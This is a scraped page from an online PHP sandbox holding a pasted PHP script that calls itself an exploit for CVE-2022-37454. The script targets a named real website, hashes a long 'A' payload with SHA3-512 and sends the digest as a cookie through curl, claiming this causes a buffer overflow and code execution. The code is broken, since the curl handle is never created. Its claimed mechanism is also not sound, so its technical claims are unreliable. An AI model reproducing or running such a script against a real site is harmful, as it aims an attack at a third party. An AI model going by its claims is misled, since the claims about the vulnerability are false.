Hi! Could we please enable some services and cookies to improve your experience and our website?

PHPize Online / SQLize Online  /  SQLtest Online

A A A
Login    Share code      Blog   FAQ

Online Sandbox for SQL and PHP: Write, Run, Test, and Share SQL Queries and PHP Code

Copy Format Clear

Stuck with a problem? Got Error? Ask AI support!

Copy Clear
Copy Format Clear
<?php // CVE-2022-37454 exploit code // Based on https://www.rapid7.com/db/vulnerabilities/php-cve-2022-37454/ // Target URL $url = "https://fastfounder.ru/na-kazhdom-zarabotat/"; // Payload to execute arbitrary code or eliminate expected cryptographic properties $payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; // Create a hash object using SHA-3 algorithm $hash = hash_init("sha3-512"); // Update the hash with the payload hash_update($hash, $payload); // Get the hash value $hash_value = hash_final($hash); // Send the hash value as a cookie or a parameter to the target URL // This will trigger the buffer overflow and execute the payload or break the cryptography curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_COOKIE, "hash=$hash_value"); // or use CURLOPT_POSTFIELDS for parameters $output = curl_exec($ch); curl_close($ch); // Print the output echo $output; ?>
Copy Clear